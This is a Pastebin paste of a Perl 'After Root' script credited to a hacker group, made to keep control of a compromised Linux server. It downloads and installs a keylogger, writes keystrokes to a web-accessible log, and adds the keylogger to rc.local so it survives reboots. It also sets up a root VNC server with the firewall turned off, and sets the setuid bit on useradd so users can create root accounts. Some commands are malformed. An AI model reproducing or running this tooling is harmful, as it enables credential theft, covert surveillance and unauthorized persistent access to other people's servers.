Advertisement
abdo53

Untitled

Feb 25th, 2017
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.77 KB | None | 0 0
  1. print q(
  2.  
  3. ###########################################
  4. # C0D3D By kasper-boy #
  5. # #
  6. # 4 #
  7. # #
  8. # sec-x4.com #
  9. # #
  10. # Gr33Tz 2: #
  11. # #
  12. # KhantastiC,Mojahd91,b0x,ZxH #
  13. # & all sec-x4 MemberS #
  14. ###########################################
  15. # All meth0d's Are Used In This Scr1pt #
  16. # #
  17. # 4 #
  18. # The injector #
  19. # & #
  20. # SadHaCkEr #
  21. ###########################################
  22.  
  23. );
  24.  
  25. print "\n\n";
  26. print "!~ W3lc0m3 2 Aft3R RooT Scr1pT ~!\n\n\n";
  27.  
  28. print "U Hav3 2 Ways To Do Th1S :~\n\n\n";
  29.  
  30. print "[1] Install Keylogg3r \n\n";
  31.  
  32. print "[2] (Priv8) Control The Server By Activating R3mot3 Desktop\n\n ";
  33.  
  34. print "[3] Adding Root With User Permission's\n\n ";
  35.  
  36. print "Your Choise :~\n\n\n";
  37. $egy = <STDIN>;
  38.  
  39. print "\n\n\n\n";
  40.  
  41. if ($egy == 1){
  42.  
  43. print " First Enter User That U Have A Cpanel On It :~\n\n ";
  44.  
  45. $user = <STDIN>;
  46. chomp $user;
  47.  
  48. print " Working ....\n";
  49. sleep (1);
  50.  
  51. # 1
  52. print "Start Downloading ...\n";
  53. system "wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz";
  54. sleep (1);
  55.  
  56. # 2
  57. print "Installing Now ...\n";
  58. system "tar xvzf logkeys-0.1.1a.tar.gz";
  59. sleep (1);
  60. system "cd cd logkeys-0.1.1a/";
  61. sleep (1);
  62. system "./configure";
  63. sleep(1);
  64. system "make";
  65. sleep(1);
  66. system "make install";
  67. sleep (1);
  68.  
  69. # 3
  70. print "Cr3at1nG Th3 Log ...\n";
  71. system "touch /home/$user/public_html/root.log";
  72. sleep (1);
  73. system "cd /home/$user/public_html/";
  74. sleep (1);
  75. system "chmod 777 root.log";
  76. sleep (1);
  77.  
  78. # 4
  79. print "Editing rc.local ....\n\n";
  80. sleep (1);
  81. open (EgyS, '>>/etc/rc.local');
  82. sleep (1);
  83. print EgyS "logkeys --start ---us-keymap --output=/home/$user/public_html/root.log --device=event4";
  84. sleep (1);
  85. close (EgyS);
  86. sleep (1);
  87.  
  88. # 5
  89. print "Starting Keylogg3r ...\n\n";
  90. sleep (1);
  91. system "logkeys --start --output /home/$user/public_html/root.log";
  92. sleep (1);
  93.  
  94. print " The Script Job Ending Her3 :)\n\n";
  95. sleep (1);
  96. print "There Only 1 Step Remaining ;)\n\n";
  97. sleep (1);
  98. print "Go 2 Cpanel & Enter Cron Job Then Writte Ur E-mail + This command cat /home/the user that u have a cpanel on it/public_html/root.log \n\n";
  99. sleep (1);
  100.  
  101. print "./Th3 EnD\n\n";
  102.  
  103. }
  104.  
  105. if ($egy ==2){
  106.  
  107. print "1st:~ Windows Side U Should Downlaod Th1s (Prog Tight VNC) From (http://www.tightvnc.com/)\n\n";
  108. sleep(1);
  109.  
  110. print "Start1ng at L1nux Side ;)\n";
  111. sleep(1);
  112.  
  113. system "yum install vnc-server";
  114. sleep(1);
  115. system 'yum groupinstall "GNOME Desktop Environment"';
  116. sleep(1);
  117.  
  118. print "Put Ur Pass:~\n";
  119. system "vncpasswd";
  120. sleep(1);
  121.  
  122. print "Edit1ng Sett1ng Now\n\n";
  123. open (Egy1, '>>/etc/sysconfig/vncservers');
  124. print Egy1 'VNCSERVERS = "1:root"\n';
  125. print Egy1 'VNCSERVERARGS[1]="-geometry 1024x768"\n';
  126. close (Egy1);
  127. sleep (1);
  128.  
  129. print "Now Checking Sett1ng\n\n";
  130. sleep(1);
  131. system "chkconfig vncserver on";
  132. sleep(1);
  133. system "service vncserver start";
  134. sleep(1);
  135.  
  136. print "D1sabl1nG F1reWall\n\n";
  137. sleep(1);
  138. system "/etc/init.d/iptables stop";
  139. sleep(1);
  140.  
  141. print "F1nal Step\n\n";
  142. sleep(1);
  143. system "service vncserver start";
  144. sleep(1);
  145. print "Now Go 2 Tight VNC Viewer & Put ( serverip:1 ) Then Press Connect & Enjoy \n\n\n";
  146. sleep(1);
  147. print "./Th3 EnD\n\n";
  148. }
  149.  
  150. if ($egy ==3){
  151.  
  152. print "Now Work1nG\n\n";
  153. sleep(1);
  154. system "cd /bin/usr/sbin/";
  155. sleep(1);
  156. system "chmod +s useradd";
  157. sleep(1);
  158. print "\n\n";
  159. print "Now You Can Add Root With User Permission'S ;)\n\n";
  160. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement